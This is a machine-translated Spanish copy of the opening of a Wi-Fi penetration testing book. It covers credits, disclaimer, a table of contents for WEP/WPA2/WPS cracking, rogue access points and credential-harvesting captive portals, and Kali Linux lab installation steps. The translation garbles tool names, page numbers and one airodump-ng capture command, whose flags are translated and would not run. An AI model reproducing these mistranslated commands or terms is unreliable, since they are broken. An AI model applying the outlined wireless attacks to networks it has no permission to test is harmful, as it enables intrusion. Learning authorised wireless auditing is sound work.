Machine Translated by Google

[Link]
Machine Translated by Google

Créditos

Autor Corrector de pruebas

Hardeep Singh Nishant Mishra

Colaboradores clave trabajo de portada

Pomwtin
Hardeep Singh
Pantera Rosa

Soporte financiero
varun bhatia

iii
Machine Translated by Google

Sobre el Autor

Hardeep Singh es un nombre entre millones que hackearon, fracasaron y siguieron practicando sin motivo
para ganar, sino para aprender. Al igual que cualquier otro novato, él también comenzó el camino BlackHat.
Más pronto se dio cuenta de que la raza humana ya se está comiendo el planeta, luchando entre sí, más
que cualquier otra especie y al menos debería usar sus habilidades para mejorar. Todo lo que tenía era
una actitud de aprendizaje eterna a la que aferrarse y un amor por la enseñanza.

Y una vez descubierto, siguió renunciando constantemente a su zona de confort y compartiendo todos
sus aprendizajes y pequeñas investigaciones con la comunidad. Es este mismo impulso de ayudar a las
personas y hacer algo bueno por la sociedad lo que lo inspiró a comenzar [Link].

Es su enfoque diligente, el gran apoyo de su familia y la fe de sus amigos lo que lo mantiene en marcha.

Es el fundador de [Link] y comparte su trabajo y artículos detallados sobre pruebas de

penetración en su blog, aparentemente un C|EH (hacker ético certificado) de EC-Council.

IV
Machine Translated by Google

Acerca del revisor

Nishant Mishra es un capacitador experimentado con un historial demostrado de trabajo en la industria

de la seguridad informática y de redes. Experto en piratería ética/Pentesting, administración de
sistemas/servidores Linux, Python, Perl y Holding C|EH, C|HFI, E|CSA, CCNA. Ingeniero con una
Licenciatura en Tecnología (B-Tech) enfocada en Ciencias de la Computación de una hermosa
universidad profesional.

Pasa la mayor parte de su tiempo dando seminarios sobre piratería ética y enseñando a estudiantes en
escuelas y universidades y le encanta hacerlo.

en
Machine Translated by Google

raí[Link]

Archivos de soporte, libros electrónicos, videos, seminarios web,

materiales de investigación y más
Para archivos de soporte y descargas relacionadas con su libro, visite [Link]/iamrootsh3ll

En [Link], también puede leer una colección de artículos técnicos gratuitos, suscribirse a una variedad de boletines gratuitos,
y reciba artículos y libros electrónicos exclusivos sobre seguridad en profundidad y pentesting.

Área de miembros
[Link] está configurado exclusivamente para todas las consultas relacionadas con este libro y para las
posibilidades adicionales que no podemos realizar en el libro mismo. Los miembros obtienen acceso gratuito a todos los libros
electrónicos publicados, contenido de video exclusivo y seminarios web organizados sobre diversos temas.
Confirma tu compra en purchase@[Link] para obtener 3 meses de acceso VIP gratis a los miembros
área

nosotros
Machine Translated by Google

Gracias especiales

Estoy inmensamente agradecido con algunas personas que han sido una parte muy importante de mi vida y
que también me apoyaron y empujaron a perseguir mi sueño. Personas por las que este libro se ha convertido
en una realidad (virtual).

Gracias a mi mamá y mi papá por dejarme hacer lo que quería hacer, incluso en los momentos difíciles
sin nada que pedir. No podría estar más agradecido contigo.

Varun Bhatia, mi hermano, por mantener su brazo (financiero) detrás de mí. Sin él, Rootsh3ll habría estado
muerto y enterrado en la oscuridad de este magnánimo océano llamado Internet. Él es mi persona a la que
acudir cada vez que alguien dice "Un amigo necesitado es un amigo de verdad".
Nunca pidió nada a cambio, aparte de mi éxito, tengo mucha suerte de tenerlo.
como un amigo, un hermano, sin mencionar un inversionista que invierte en mi buena voluntad y éxito sin
ningún ROI. ¡Él es una verdadera joya!

Prienka Bakshi, una de las pocas personas más cercanas a las que admiro de corazón siempre. Gracias
de corazón a ella por estar de mi lado, por empujarme cada vez que bajaba y detenerme.
de perder el tiempo, ayudándome a escribir este libro, incluso cuando ella vive lejos, se aseguró de dejarme
una marca y ayudarme a dejar una marca (pequeña).

Este libro también está dedicado a todas las personas del mundo que aspiran a aprender la tecnología central,
cómo romperla y asegurarla.

¡Gracias a todos!

viii
Machine Translated by Google

Descargo de responsabilidad

El contenido de este libro tiene únicamente fines educativos. Está diseñado para ayudar a los usuarios
aprender sobre las vulnerabilidades de la red Wi-Fi para probar su propio sistema contra amenazas
a la seguridad de la información y proteger su infraestructura de TI de ataques similares. [Link]
y el autor de este libro no se hacen responsables de las acciones que resulten del uso inapropiado del
material de aprendizaje contenido en este libro.

viii
Machine Translated by Google
Machine Translated by Google

Tabla de contenido
0
CONFIGURACIÓN DEL LABORATORIO 1

REQUISITOS DE HARDWARE 1
REQUISITOS DE SOFTWARE 2
INSTALACIÓN KALI LINUX : 3
INSTALAR KALI LINUX BAJO VMWARE 3
INSTALANDO KALI LINUX EN PC 11

Kali Linux en USB: Ventajas 11

HD Instalar Kali Linux: Requisitos previos 11

Para de perder el tiempo 12

Crear Kali Linux USB de arranque 13
ELIMINAR KALI LINUX HD INSTALAR dieciséis

CONFIGURACIÓN DEL ADAPTADOR INALÁMBRICO 18

CONFIGURAR TARJETA ALFA 20
RESUMEN 25

1
ENTENDIENDO LOS FUNDAMENTOS DE LAS REDES WI-FI 26

LAS REDES INALÁMBRICAS (WI-FI) Y SU NECESIDAD 26

¿QUÉ ES EL WI-FI? 27
¿CUÁL ES LA NECESIDAD DE WI-FI? 27
TIPOS DE CIFRADO Y SU NECESIDAD 27
¿CUÁLES SON LOS TIPOS DE CIFRADO? 27
¿CUÁL ES LA NECESIDAD? 28
¿EN QUÉ SE DIFERENCIA WPA2 DE WPA? 28
ENTENDIENDO LA IP PÚBLICA Y PRIVADA 29
PI PÚBLICA 29
IP PRIVADA 29
Clases, subred y tamaño de grupo 29
¿CÓMO COMPROBAR LA IP PÚBLICA ? 30
USOS DE LA IP PÚBLICA 30
POSIBLES ATAQUES A UN PUNTO DE ACCESO WI-FI (AP) 30
FUTURO DEL WI-FI 31

yo
Machine Translated by Google

2
CRACKEAR LA SEGURIDAD DE LA RED INALÁMBRICA 32

INTRODUCCIÓN AL CONJUNTO DE HERRAMIENTAS AIRCRACK-NG 32

¿QUÉ ES AIRCRACK-NG? 32
DESCARGAR AIRCRACK-Idioma 33
INSTALAR AIRCRACK-IDIOMA 33
AIRMON-NG 34
AIRODUMP-NG 35
CONCLUSIÓN 36

INTRODUCCIÓN A WIRESHARK 37
HISTORIA 38

¿Por qué Ethereal fue renombrado? 38

INSTALACIÓN Y CONFIGURACIÓN 39
modo monitor 40

Seleccionar interfaz de rastreo 41

deja de olfatear 42
FILTROS Y ANÁLISIS DE PAQUETES 42

Mostrar filtros 42

Filtros de captura 43

El filtro de captura no es un filtro de visualización 43

GUARDAR PAQUETES 45
CODIFICACIÓN DE COLOR 45
CONCLUSIÓN 45

CRACKEO WEP UTILIZANDO AIRCRACK-NG 46

VISIÓN GENERAL 46
OTRA MANERA DE SOLUCIONAR EL ERROR “MODO MONITOR” EN KALI LINUX 50

CRACKEO WPA2-PERSONAL [AIRCRACK-NG] 51

¿QUÉ ES WPA2-PSK? 51
APRETÓN DE MANOS DE 4 VÍAS 51
¿QUÉ ES UN ATAQUE DE DICCIONARIO? 53
CONTRAMEDIDAS 57
CONCLUSIÓN 58

CRACKEO DE WPS 59
¿QUÉ ES WPS? 59
¿QUÉ ES REVER? 59
UNA VERDAD FEA SOBRE WPS [ PARA PENTESTERS] 62
CONTROLADORES INALÁMBRICOS COMPATIBLES 62
CONTRAMEDIDAS 63

iii
Machine Translated by Google

3
CRACKEO AUTOMATIZADO DE WI-FI 64

WIFITE: HERRAMIENTA DE AUDITORÍA/HACKING INALÁMBRICO AUTOMATIZADO 64

DESCARGAR WIFI sesenta y cinco

INSTALACIÓN DE UNA HERRAMIENTA (WIFITE) COMO COMANDO EN LINUX sesenta y cinco

CRACKEAR WEP UTILIZANDO WIFITE 66

Cosas a tener en cuenta 67

CRACKING WPA/2 UTILIZANDO WIFITE ¿CÓMO 69

SOLUCIONAR EL ERROR DE CAPTURA DE HANDSHAKE WPA/2 EN WIFITE? 70

Uso de airodump-ng para solucionar el problema de Wifite Handshake 71

Use la última versión de Wifite para solucionar el problema de captura de Handshake 71

WIFI ENFOCADO LÁSER 72

4
ACELERANDO EL CRACKEO DE WPA/2 74

INTRODUCCIÓN 74
¿QUÉ ES PMK? 75
¿QUÉ ES COWATTY? 76
¿QUÉ ES PIRITA? 76

¿Qué es el intercambio espacio-tiempo? 76

INSTALACION Y CONFIGURACION 77
INSTALACIÓN DE COWPATTY DESDE EL CÓDIGO FUENTE 77
INSTALACIÓN DE PYRIT DESDE EL CÓDIGO FUENTE 77
GENERAR PMKS UTILIZANDO GENPMK 78
GENERAR PMKS UTILIZANDO PYRIT 79

CRACK WPA2-PSK [ EMPANADA DE VACA VS. AIRCRACK-NG] 80

CRACKEO DE WPA2-PSK CON AIRCRACK-NG 80

[¡EXTRA!] PYRIT + COWPATTY STDIN 81

USO DE HERRAMIENTAS BASADAS EN GPU 84

USO DE GPU PARA CRACKEAR CONTRASEÑAS WPA/2 ¿QUÉ ES 85

HASHCAT? 85
¿POR QUÉ USAR HASHCAT EN PRIMER LUGAR? 85

Tipos de ataques admitidos 87

CONFIGURACIÓN DEL LABORATORIO 87

Instalación del controlador de gráficos 87

Descargar hashcat 87

IV
Machine Translated by Google

Compatibilidad de archivos pcap con Hashcat Convertir 87

archivo .cap a archivo <.hccap> CRACIFICACIÓN DE 88

CONTRASEÑAS WPA/2 UTILIZANDO HASHCAT Ataque de máscara WPA/ 88
2 mediante ataque Hashcat Hybrid. 89
91

Pausa/reanudación de craqueo WPA/2 en Hashcat (una de las mejores características) 92

¿Cómo restaurar? 93

GUIÓN AIRCRACK BOOST 94

CARACTERÍSTICAS 94
DEPENDENCIAS 94
HACER EJECUTABLE EL SCRIPT DE SHELL 94
EJECUTAR 95

Ejecutar a través de argumentos de línea de comando 95

Ejecutar mediante entrada estándar 95

5
POST-EXPLOTACIÓN DE LA RED 98

INTRODUCCIÓN 98
¿QUÉ ES UNA SUBRED? 99
HERRAMIENTAS UTILIZADAS 100
INSTALACIÓN Y CONFIGURACIÓN 100
ESCANEANDO LA SUBRED 101
ESCANEAR LA SUBRED UTILIZANDO NMAP 101
¿CÓMO FUNCIONA EL ENVENENAMIENTO ARP ? 104
PREVENIR ATAQUES DE OLFATO 107
INTERRUPCIÓN DE LA RED WI-FI 108
DISECCIÓN DE UN CLIENTE INALÁMBRICO 109

6
PUNTO DE ACCESO ROGUE: INTRODUCCIÓN 110

VISIÓN GENERAL 110

RESUMEN DEL ATAQUE 111
HERRAMIENTAS UTILIZADAS 111
PREPARACIÓN DE ATAQUE 111
PUNTO DE ACCESO ROGUE : CONFIGURACIÓN 112
INSTALACIÓN 112

Instalar isc-dhcp-servidor 112

en
Machine Translated by Google

CONFIGURAR SERVIDOR APACHE MYSQL Y DHCP 113

Configurar el servidor isc-dhcp 114

(OPCIONAL) AIRMON-NG, CONFLICTO DE ADMINISTRADOR DE RED 114
RECOPILACIÓN DE INFORMACIÓN 115
Habilitar el modo de monitor 115

Recopilación de información con airodump-ng 115

(OPCIONAL) LLEVA LA POTENCIA TX AL MÁX: 1000MW ¿Por qué necesitamos 115
cambiar de región para operar nuestra tarjeta a 1000mW? 116
CONFIGURAR RED 116

Encienda el punto de acceso falso 116

Asignar IP y máscara de subred 116

Establecer reglas de Firewall en Iptables 117

Habilitar el reenvío de IP 117

Iniciar los servicios 118
¡ATAQUE! 118

CONFIGURACIÓN DE AP ROGUE : UNA MANERA MÁS FÁCIL 121

COMPRENDER EL ESCENARIO DE ATAQUE BÁSICO 121
INSTALACIÓN DE CONFIGURACIÓN 122
Instalación: 123

Configurar hostapd 123

Configurar dnsmasq 123

CONFIGURACIONES OPCIONALES 125

7
ROGUE AP: UNA INMERSIÓN MÁS PROFUNDA 127

HACKING WPA2 EMPRESA 127

INTRODUCCIÓN 128

¿Diferencia entre WPA2 - Personal y Enterprise? 128

INSTALACIÓN 128
CRACK EL HACHÍS 130
VIRTUALIZACIÓN DE INTERFAZ : AP FALSO DE TARJETA ÚNICA 132
INTRODUCCIÓN 132
¿QUÉ ES UNA INTERFAZ VIRTUAL (VIF)? 132
HERRAJES UTILIZADOS 134
SOFTWARE UTILIZADO 134
CONFIGURAR PUNTO DE ACCESO ROGUE DE TARJETA ÚNICA + HOTSPOT 135
CONÉCTESE A UN PUNTO DE CONEXIÓN WI- FI 136
POTENCIA EL AP ROGUE 137

(Opcional) Habilite el acceso a Internet para la víctima 137

Habilitar el reenvío de iptables 137

Suplantar el tráfico HTTP entrante 137

nosotros
Machine Translated by Google

SOLUCIÓN DE ADVERTENCIA "SIN ACCESO A INTERNET " 138

EJEMPLOS DE ERROR "SIN ACCESO A INTERNET" EN WIN 7/10 139

¿Qué está causando exactamente el error "Sin acceso a Internet"? 139

8
PORTALES CAUTIVOS 144

EN TEORIA 144
INTRODUCCIÓN 145
ESTRATEGIA BÁSICA DETRÁS DE LA DETECCIÓN DE PORTAL CAUTIVO 145
DIFERENCIAS ENTRE DISPOSITIVOS CLIENTE 146

Método de detección de portal cautivo por varios sistemas operativos 146

La solicitud secreta "wispr" de Apple 147

EN EL MUNDO REAL 149

¿QUÉ ES MOD_REWRITE? 149

Ventajas de mod_rewrite mod_rewrite 149

Conceptos básicos Definición de 149

reglas Variables del servidor 150

150

Sintaxis de la regla 150

REDIRECCIÓN BASADA EN AGENTE DE USUARIO 151

CONFIGURAR APACHE PARA MOD_REWRITE 152

Configuración del portal cautivo para dispositivos Apple 152

Configuración del portal cautivo para dispositivos Android 152

Configuración del portal cautivo para Windows 153

Configurar iptables para la redirección 154

Habilitar módulos 154
PROTECCIÓN CONTRA ESTE ATAQUE 154

9
AP FALSO ÚLTIMO 155

VISIÓN GENERAL 155

CONFIGURACIÓN DEL PUNTO DE ACCESO 156
PASO 1: ELIMINAR LOS PROCESOS PROBLEMÁTICOS 156
PASO 2: INICIAR EL SERVIDOR DHCP 156
PASO 3: CONFIGURAR EL SERVIDOR WEB APACHE2 156

Habilitar módulo mod_rewrite 157

PASO 4: DNS FALSO 157

viii
Machine Translated by Google

PASO 5: COSECHAR LAS LLAVES 157

Desglose de comandos: 158
PASO 6 : CONCLUSIÓN 158
PASO 7: LA SALSA SECRETA 158
PASO 8: HAZLO MÁS SILENCIOSO (OPCIONAL) 159

10
HACKEO DE WI-FI [APÉNDICE] 165

CONDUCCIÓN DE GUERRA: INTRODUCCIÓN 165

CÁLCULO DE LA UBICACIÓN DEL PUNTO DE ACCESO 166

ENCUENTRE DISPOSITIVOS PERDIDOS O ROBADOS 167

LOCALIZAR DISPOSITIVO WI-FI CON PROBEMON 167
Instalación 167
¿Qué es la lista IEEE OUI? 168

VALIDACIÓN DE APRENDIZAJE DE MANOS 170

REQUISITOS: 170
MANUALMENTE: UTILIZANDO EL ANALIZADOR DE PAQUETES WIRESHARK 170
Desglose de comandos: 170
UTILIZANDO HERRAMIENTAS COMO: AIRCRACK-NG, PYRIT 172
Conclusión: 174

viii
Machine Translated by Google

Prefacio
Las redes inalámbricas se han vuelto omnipresentes en el mundo actual. Millones de personas lo utilizan
en todo el mundo todos los días en sus hogares, oficinas y puntos de acceso públicos para iniciar sesión en
Internet y realizar trabajos personales y profesionales. Aunque la tecnología inalámbrica hace la vida increíblemente
fácil y nos brinda una gran movilidad, conlleva riesgos. En los últimos tiempos, las redes inalámbricas inseguras
se han utilizado para infiltrarse en empresas, bancos y organizaciones gubernamentales.
La frecuencia de estos ataques solo se intensifica, ya que los administradores de red aún no tienen ni idea cuando
se trata de proteger las redes inalámbricas de una manera sólida e infalible.
Kali Linux Wireless Pen-testing and Security for Beginners tiene como objetivo ayudar al lector a comprender
la profundidad de las inseguridades asociadas con las redes inalámbricas y cómo realizar pruebas de penetración
para encontrarlas, conectarlas y asegurarlas/parcharlas aún más. Esta es una lectura esencial para quienes
deseen realizar auditorías de seguridad en redes inalámbricas y siempre quisieron una práctica paso a paso.
Como cada ataque inalámbrico explicado en este libro es seguido inmediatamente por una demostración práctica,
el aprendizaje es muy completo.
Hemos elegido Kali Linux como plataforma para probar todos los ataques inalámbricos de este libro. Kali Linux,
como la mayoría de ustedes ya sabrá, es la distribución de prueba de penetración más popular del mundo.
Contiene cientos de herramientas de seguridad y piratería, algunas de las cuales usaremos en este curso de este
libro.

para quien es este libro

Aunque este libro es una serie para principiantes, está destinado a usuarios de todos los niveles, desde aficionados
hasta expertos en seguridad inalámbrica. Hay algo para todos. El libro comienza con ataques simples, pero luego
pasa a explicar los más complicados y, finalmente, analiza los ataques y la investigación de última generación.
Como todos los ataques se explican mediante demostraciones prácticas, es muy fácil para los lectores de todos
los niveles probar rápidamente el ataque por sí mismos. Tenga en cuenta que aunque el libro destaca los
diferentes ataques que se pueden lanzar contra una red inalámbrica, el propósito real es educar al usuario para
que se convierta en un probador de penetración inalámbrica. Un probador de penetración experto entendería
todos los ataques que existen y podría demostrarlos con facilidad, si su cliente lo solicita.

Piratería
La piratería de material protegido por derechos de autor en Internet es un problema constante en todos
los medios. En rootsh3ll, nos tomamos muy en serio la protección de nuestros derechos de autor y licencias.
Si encuentra copias ilegales de nuestros trabajos, en cualquier forma, en Internet, indíquenos la dirección de
la ubicación o el nombre del sitio web de inmediato para que podamos buscar una solución.
Póngase en contacto con nosotros en copyright@[Link] con un enlace al material sospechoso
de piratería.

ix
Machine Translated by Google

Agradecemos su ayuda para proteger a nuestros autores y nuestra capacidad para brindarle valiosos
contenido.

Convenciones
En este libro, encontrará varios estilos de texto que distinguen entre diferentes tipos de
información. Aquí hay algunos ejemplos de estos estilos y una explicación de su significado.

Las palabras de código en el texto, los nombres de las tablas de la base de datos, los nombres de las carpetas, los nombres de los archivos, las extensiones de los archivos, las

rutas de acceso, las direcciones URL ficticias, la entrada del usuario y los identificadores de Twitter se muestran de la siguiente manera: "Abra la terminal y escriba iwconfig".

Cualquier entrada o salida de la línea de comandos se escribe de la siguiente manera:

airodump-ng --bssid [Link] --canal 6 --escribir wlan0mon

el cuadro gris con contorno negro muestra la salida del comando anterior y/o
el contenido de un archivo

Las notas importantes se mostrarán en cuadros amarillos.

El desglose del comando se explicará en bloques laterales azules como este

Preguntas
Puede contactarnos en query@[Link] si tiene algún problema con algún aspecto del libro, publique su
consulta directamente en el foro de soporte [Link] o envíe un correo electrónico al autor a
harry@[Link] y haremos todo lo posible para solucionarlo.

X
Machine Translated by Google

0
Configuración del laboratorio

Requisitos de hardware
• Una computadora portátil con una tarjeta de interfaz de red (NIC) que funcione

• Usaré una computadora portátil para instalar y ejecutar Kali Linux en VMWare como la máquina del atacante y
el host (Windows) como la máquina de la víctima. Kali Linux debe tener al menos 1 GB de RAM de RAM
asignada. Esto se debe a que ejecutaremos un
• gran cantidad de software de uso intensivo de memoria en toda la serie.
• 1 adaptador inalámbrico Alfa: para obtener el mejor resultado, necesitamos una tarjeta Wi-Fi USB que
admita la inyección de paquetes y la detección de paquetes. Usaremos Alfa AWUS036NH 2000mW en
esta serie Que puede comprar en eBay / Amazon, que se vende al por menor por menos de $ 30 en el
momento de escribir este artículo.
• 1 TP-LINK WN-722N Adaptador USB v1 (no versión 2) [Opcional]
• Recepción de señal más débil, menor potencia de transmisión (TX), más barata y una de las tarjetas Wi-Fi
económicas más adecuadas para Kali Linux. Se utiliza para una tarea muy específica que no se puede
realizar con la tarjeta Alfa AWUS036NH. Ver Capítulo 7 parte 2
• 1 punto de acceso: un punto de acceso compatible con los estándares de encriptación WEP, WPA/WPA2 y
WPS. Un enrutador inalámbrico N TP-Link MR3420 3G se utiliza para la ilustración en este
libro.

• Una conexión a Internet estable y rápida para una descarga óptima de software y otros
experimentos

1
Machine Translated by Google

Requisitos de Software
• Kali Linux: el último sistema operativo de Pentesting
• Kali Linux 2017.1 ISO se puede descargar desde la página de descarga del sitio web oficial ubicada en https://
[Link]/ downloads/. Es un sistema operativo de código abierto que viene con una variedad de
herramientas preinstaladas para pruebas de penetración.

• Instalación de máquina virtual/disco duro (HD)

• Se puede realizar una instalación de disco duro en caso de que desee ejecutar Kali Linux con todos los recursos.
Si está en una partición GPT, la instalación de una máquina virtual será una opción adecuada para usted.

• VMWare Workstation se utiliza para ejecutar Kali Linux y conectar dispositivos inalámbricos.
Para que no sea diferente a un Kali Linux instalado en PC con una tarjeta Alfa conectada. Puede descargar
la última versión de VMWare desde su sitio web oficial.

• Windows 7/8/10 como máquina(s) anfitriona(s): Usaremos Windows como la víctima que se conectará al
punto de acceso original de la serie. La tarjeta de red de la máquina host se dedicará solo al host (Windows)
y la tarjeta Alfa se dedicará a Kali Linux (en VMWare) solo con fines de ataque.

Nota: Aunque estamos usando una máquina con Windows para conectarnos a AP, podemos hacerlo con cualquier
dispositivo electrónico capaz de realizar tareas inalámbricas (relacionadas con Wi-Fi), como dispositivos móviles, tabletas,
impresoras inalámbricas, etc.

2
Machine Translated by Google

Instalación de Kali Linux:

Instalar Kali Linux bajo VMWare

Como principiante, es seguro instalar Kali Linux en un entorno virtual. Te da libertad para experimentar,
explorar el sistema operativo sin tener que perder los datos en ningún caso.

Una máquina virtual, o VM, es una aplicación que se ejecuta en Windows que crea un entorno
que simula una computadora completamente separada.

Todo lo que sucede en la VM permanece dentro de la VM. Se comporta exactamente como si fuera
una máquina física completamente separada.

Eso implica que cualquier descarga, cambio, actualización, instalación... cualquier cosa... que se cree o
guarde dentro de la máquina virtual solo es accesible a través de la VM de alguna manera.

Y si elimina la VM, es como deshacerse de una PC. Se borra todo el contenido del disco duro virtual.

Suponiendo que haya descargado la versión adecuada de Kali (32/64 bits), comencemos la instalación

3
Machine Translated by Google

Paso 1:
“
Inicie VMWare Workstation, vaya al menú de archivo y haga clic en "Nueva máquina virtual

Paso 2:
Haga clic en siguiente. con la opción seleccionada "Típica (recomendada) "

4
Machine Translated by Google

Paso 3:

establezca el nombre de la máquina virtual y explore el archivo ISO de Kali Linux.

Paso 4:
Asigne el tamaño del disco a Kali y haga clic en Siguiente

5
Machine Translated by Google

20 GB serán óptimos para la máquina virtual, ya que usaremos principalmente herramientas preinstaladas
durante esta serie.

Paso 5:
haga clic en Finalizar y luego en Encienda esta máquina virtual.

Paso 6:
ahora la máquina virtual se iniciará. Seleccione/resalte la opción Instalar y presione [ENTRAR]

6
Machine Translated by Google

Paso 7:

Ingrese su nombre de host (rs en este caso)

Paso 8:

Ingrese la contraseña deseada (pasar en este caso)

Paso 9:

Seleccione el disco, presione [ENTRAR] , luego seleccione Todos los archivos en una partición y presione [ENTRAR].

7
Machine Translated by Google

Paso 10:

seleccione Finalizar partición y escriba los cambios en el disco.

Paso 11:

Seleccione Sí para confirmar Escribir cambios en discos y presione [ENTRAR].

Paso 12:

Espere la configuración para instalar el sistema

Paso 13:

El programa de instalación le pedirá que seleccione un espejo de red para descargar los paquetes más recientes. Seleccione No y
luego haga clic en cancelar.

8
Machine Translated by Google

Actualizar manualmente desde el escritorio nos ahorrará tiempo.

Paso 14:

Instale GRUB (GRand Unified Bootloader) al registro maestro de arranque. Para elegir entre las opciones para iniciar Kali

Linux dentro de VMWare después de la instalación.

Paso 15:

La configuración ahora está completa. Seleccione Continuar y presione [ENTRAR].

Paso 16:

Ahora inicie la máquina virtual "Kali Linux" y presione [ENTER] para continuar con el arranque.

9
Machine Translated by Google

Paso 17:
Presione [ENTER] en otro e ingrese las credenciales
Nombre de usuario: raíz

Contraseña: pase (ingresada previamente en el paso 8) y haga clic en iniciar sesión

Ahora, hemos instalado con éxito Kali Linux en VMWare Workstation e iniciado sesión en el Escritorio.

Veamos cómo instalar Kali en HD o Dual Boot

10
Machine Translated by Google

Instalar Kali Linux en PC

Para un principiante, no se recomienda encarecidamente el arranque dual de Kali Linux en su máquina principal.
Como puede conducir a una posible pérdida de datos, accidentalmente.

Kali se puede ejecutar en modo en vivo, es decir, directamente desde USB sin ninguna instalación, o instalarlo completamente
en su disco duro.

Kali Linux en USB: Ventajas

La mejor manera de ejecutar o instalar Kali Linux es ejecutarlo desde un USB. Este método tiene varias ventajas:

• Ultraportátil : USB siempre ha sido conocido por su portabilidad. La instalación de Kali en un USB lo hace
ultraportátil y nos permite ejecutarlo dondequiera que vayamos. solo necesita conectar y usar la memoria USB
y estamos listos con nuestro Kali.

• Instalación más rápida : las versiones anteriores de USB (2.0) admiten una velocidad de lectura de un máx. de 7-10
MBPS y el reciente USB 3.0 son incluso más rápidos que eso. Lo que hace que la instalación de Kali Linux sea
increíblemente rápida.

• Personalizable : Linux siempre es de código abierto, al igual que Kali. Puede personalizar y
compilar Kali Linux e instalar su propia versión en la memoria USB.
• Persistente : el arranque en Live Disc desde USB borra toda la actividad o las tareas realizadas después de reiniciar
el sistema. Live Kali instalado en USB se puede hacer persistente con un poco de esfuerzo.

Como haremos muchos cambios en el sistema a lo largo del camino, es ideal tener una instalación completa disponible.

Sin embargo, para un principiante, recomiendo realizar todas las pruebas en una máquina virtual.

HD Instalar Kali Linux: Requisitos previos

• Memoria USB (>4 GB) - Podemos iniciar el sistema Live o instalar a través de USB. 4+ conciertos de
el almacenamiento sería suficiente.

• Kali Linux ISO : el archivo ISO contiene el sistema operativo y la información de arranque necesaria, que se
escribirá en la memoria USB y nos permitirá acceder a GRUB.

• Computadora portátil/de escritorio (~4 GB de RAM) : realizaremos tareas de memoria extensa. por lo tanto, un
requisito mínimo es un sistema con 4 GB de RAM y un procesador de doble núcleo. Para garantizar que Kali Linux
funcione bien a lo largo de la serie.

• Una instalación de Windows : necesitaremos Windows para particionar el disco para Kali Linux. Será fácil y seguro
para los principiantes.

• Rufus Bootable USB Creator - Se explica por sí mismo. Descargar desde [Link]

11
Machine Translated by Google

GPT. Cheque. Para de perder el tiempo

Los discos de registro de arranque maestro (MBR) utilizan la tabla de particiones BIOS estándar (heredada).
Los discos de la tabla de particiones GUID (GPT) utilizan la interfaz de firmware extensible unificada (UEFI). Una ventaja
de los discos GPT es que puede tener más de cuatro particiones primarias en cada disco.
Todas las demás computadoras portátiles ahora vienen con el modo UEFI, a diferencia de las máquinas más antiguas
que se ejecutan en BIOS heredado. Con la tabla de particiones GPT viene UEFI y con msdos/Master Boot Record (MBR)
tabla de particiones viene BIOS. Tanto el disco duro de destino como el medio de instalación (USB) deben tener la misma
tabla de particiones. Ya sea GPT-GPT o MBR-MBR, de lo contrario es una incompatibilidad.
Es sencillo comprobar si tienes un disco tipo GPT o msdos.

1. Presione Win + r en su Windows

2. Escriba diskpart. Presione [ENTRAR]
3. Introduzca el disco de la lista

4. Verifique el asterisco debajo de la última columna, es decir, GPT

DISKPART> lista de disco

Disco ### Estado Tamaño Gratis Hombre gpt

-------- -------------------- ------- --- ---
Disco 0 En línea 447 GB 1024 KB
Disco 1 No Media 0 segundo 0 segundo

Disco 2 En línea 14GB 0 segundo

Si un disco es GPT, tendrá un asterisco (*) debajo de la columna "GPT". Si es un disco MBR, estará en blanco debajo de la
columna GPT.

La mía es una tabla de partición de estilo MBR, por lo que la columna GPT está en blanco. De lo contrario, se vería así:

DISKPART> lista de disco

Disco ### Estado Tamaño Gratis Hombre gpt

-------- -------------------- ------- --- ---
Disco 0 En línea 447 GB 1024 KB *
Disco 1 No Media 0 segundo 0 segundo

Disco 2 En línea 14GB 0 segundo

El disco 0 es mi unidad SSD de 500 GB y

El disco 2 es mi unidad USB de 16 gigas. 14,8 GB totales utilizables.

12
Machine Translated by Google

Crear Kali Linux USB de arranque

Ahora que sabe qué tipo de partición tiene su máquina, el siguiente paso es crear un USB de arranque con Rufus.

1. Descarga y abre Rufus

2. Seleccione el esquema de
partición apropiado.

3. Seleccione Unidad USB

4. Formateo rápido de la unidad

5. Busque Kali Linux

archivo ISO

6. ¡Quema!

Los sistemas Linux utilizan un espacio dedicado, espacio/partición de intercambio, como método de gestión de la
memoria. Es simplemente [Link] para sistemas Linux.
El espacio de intercambio en Linux se usa cuando la cantidad de memoria física (RAM) está llena. Si el sistema
necesita más recursos de memoria y la RAM está llena, las páginas inactivas en la memoria se mueven al espacio de
intercambio. El espacio de intercambio puede ser una partición de intercambio dedicada (recomendado), un archivo de
intercambio o una combinación de particiones de intercambio y archivos de intercambio.

Regla general: Intercambiar archivo/tamaño de partición = Memoria física.

13
Machine Translated by Google

Antes de comenzar la instalación, cree una partición que se dividirá automáticamente.

1. Instalación y

2. Intercambiar partición

Paso 1:

Haga clic derecho en Computadora.

Haz clic en Administrar.

Paso 2:

Seleccione Almacenamiento > Administración de discos

en el panel izquierdo 1. Haga clic derecho en una unidad

con > 40 GB de espacio libre.

2. Reducir (C: en este caso) para reducir algo de espacio de la unidad seleccionada.

La partición seleccionada debe ser primaria. Se necesita una partición de tipo principal para iniciar Kali. Escribiremos el cargador de

arranque de Kali (GRUB) en el registro de arranque maestro durante la instalación. Por lo tanto, asegúrese de que la partición que

seleccione sea Primaria.

Espere a que finalice el escaneo.

Introduzca el tamaño en MB (40 GB x 1024 = 40960 MB). Haga clic en Reducir.

14
Machine Translated by Google

Solo tenía 20484 MB de espacio retráctil. Pero se recomienda que use al menos 30 GB
para evitar problemas de poco espacio en disco.

Se crea una partición de color negro sin asignar

USB de arranque. ¡Cheque!

Dividir. ¡Cheque!

Apagar y arrancar con USB.

El arranque desde medios USB/DVD varía según el proveedor. Intente presionar <ESC>, <F8>, <F10>, <F12> o la tecla Supr para arrancar
desde su USB. De lo contrario, dé prioridad al primer dispositivo de arranque a USB en BIOS

15
Machine Translated by Google

Eliminar la instalación de Kali Linux HD

Después de eliminar Kali Linux, no podrá iniciar Windows ni ningún sistema operativo instalado después de reiniciar. ¡Entonces,

asegúrese de haber creado un USB de arranque de Kali Linux para la instalación o el rescate!

P. ¿Por qué eliminar Kali Linux? Es la mejor distribución de pruebas de penetración que existe.

Bueno, como Kali Linux es una distribución de código abierto y no tiene absolutamente NINGUNA GARANTÍA, y además, usaremos la

cuenta raíz con mucha frecuencia, por lo que hay posibilidades de que uno pueda corromper el cargador de arranque mientras juega

con Kali y cause problemas al arrancar. el sistema operativo

Existe un Kali Linux inutilizable previamente instalado en su PC y decide eliminarlo e instalar otra Distro de Pentesting (cualquiera).

